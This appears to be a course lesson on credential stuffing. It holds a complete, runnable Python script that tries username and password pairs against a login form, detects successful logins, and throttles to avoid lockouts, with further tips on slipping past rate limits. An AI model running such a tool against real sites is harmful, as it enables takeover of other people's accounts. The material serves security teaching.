Automating Credential Stuffing

Updates the credential stuffing code to test multiple different username and password combinations against the login page.

Introduction to automatic credential stuffing

Credential stuffing is a common attack technique because it is an easily automated attack vector. A fully automated credential-stuffing attack requires three things:

  • A means of submitting login credentials to the target system

  • The ability to tell whether or not a login attempt succeeded

  • A list of usernames and passwords to try on the site

In the previous lessons we implemented the first two items on this list: a script that attempts to log into a site with a single username and password and checks whether the attempt succeeded. Now we’ll complete the automated attack by updating the script to make multiple attempts using a list of usernames and passwords.

Creating a credential dictionary

An important first step when building a credential stuffer is defining a dictionary of usernames and passwords to try in the attack. A credential dictionary can come from a few different sources, including the following:

  • Common password lists

  • Breached credentials

  • Random password generation

Numerous lists of credentials are available on the internet for download; some are built into existing tools, and tools exist to automatically generate tailored lists. In this lesson, we’ll use a small list containing some common, simple usernames and passwords.

Automating the credential-stuffing attack

Previously, we implemented a simple credential stuffer that performs a single username/password check and automatically classifies the result. The next step is to update the code to iterate over a list of usernames and passwords, submitting each combination until a valid one is found (or the list is exhausted).

The following code block shows how the existing credential stuffer, built on the requests library, can be updated to perform multiple login attempts instead of one.
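The code block below is an added example, not the lesson’s own script. It assumes a login form that POSTs two fields (named `username` and `password` by default), that a failed login returns HTTP 200 with a recognisable failure string in the body (`"Invalid"` by default), and that a successful login answers with a 3xx redirect; all three are parameters so they can be tuned to a real target. The small credential dictionary is constructed for the example, since the lesson’s own list is not shown on the page. The loop is written against a pluggable `submit(username, password)` callable, so the same loop can be driven by the requests-based submitter for a live run or by the offline stand-in `fake_login_page` for testing.

```python
"""Credential stuffer that iterates a dictionary of username/password
pairs. Added example; assumptions about the target's form field names
and success/failure signals are parameters rather than facts."""
import itertools
import time
from typing import Callable, Iterable, List, Tuple

Credential = Tuple[str, str]

# Constructed sample dictionary (the lesson's real list is not on the page).
USERNAMES = ["admin", "user", "test"]
PASSWORDS = ["password", "123456", "admin", "letmein"]


def login_succeeded(status_code: int, body: str,
                    failure_marker: str = "Invalid") -> bool:
    """Classify one login response. Assumption: the app redirects (3xx) on
    success and echoes `failure_marker` in a 200 page on failure."""
    if 300 <= status_code < 400:
        return True
    return status_code == 200 and failure_marker not in body


def cross_product(usernames: Iterable[str],
                  passwords: Iterable[str]) -> List[Credential]:
    """Pair every username with every password."""
    return list(itertools.product(usernames, passwords))


def make_requests_submitter(login_url: str,
                            user_field: str = "username",
                            pass_field: str = "password",
                            failure_marker: str = "Invalid",
                            ) -> Callable[[str, str], bool]:
    """Build a submit function that POSTs the form with `requests`. Imported
    lazily so the rest of the module runs without a network or the library."""
    import requests  # real library; only needed for a live run

    session = requests.Session()  # keeps cookies the login page may set

    def submit(username: str, password: str) -> bool:
        resp = session.post(login_url,
                            data={user_field: username, pass_field: password},
                            timeout=10, allow_redirects=False)
        return login_succeeded(resp.status_code, resp.text, failure_marker)

    return submit


def stuff_credentials(submit: Callable[[str, str], bool],
                      credentials: Iterable[Credential],
                      stop_on_first: bool = True,
                      delay: float = 0.0) -> List[Credential]:
    """Try each (username, password) pair and return the ones that worked."""
    found: List[Credential] = []
    for username, password in credentials:
        if submit(username, password):
            found.append((username, password))
            if stop_on_first:
                break
        if delay:
            time.sleep(delay)  # crude throttle against lockouts / rate limits
    return found


def fake_login_page(valid: Credential) -> Callable[[str, str], bool]:
    """Offline stand-in for a target: returns the same classification the
    requests submitter would, so the loop can be exercised without a network."""
    def submit(username: str, password: str) -> bool:
        if (username, password) == valid:
            return login_succeeded(302, "")  # redirect on success
        return login_succeeded(200, "Invalid username or password")
    return submit


if __name__ == "__main__":
    # Offline demo. For a live run against an authorised target, swap in:
    #   submit = make_requests_submitter("http://target.example/login")
    submit = fake_login_page(("admin", "letmein"))
    hits = stuff_credentials(submit, cross_product(USERNAMES, PASSWORDS))
    print("valid credentials:", hits)
```

Two practical notes. First, the success check is the fragile part: a site that returns 200 for both outcomes, or that redirects failed logins back to the form, will defeat the default heuristic, so confirm `login_succeeded` against one known-good and one known-bad attempt before trusting the loop. Second, every attempt is a request the target can count; set `delay` (and rotate the order of usernames) when lockout or rate-limiting policies are in play, and only run this against systems you are authorised to test.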
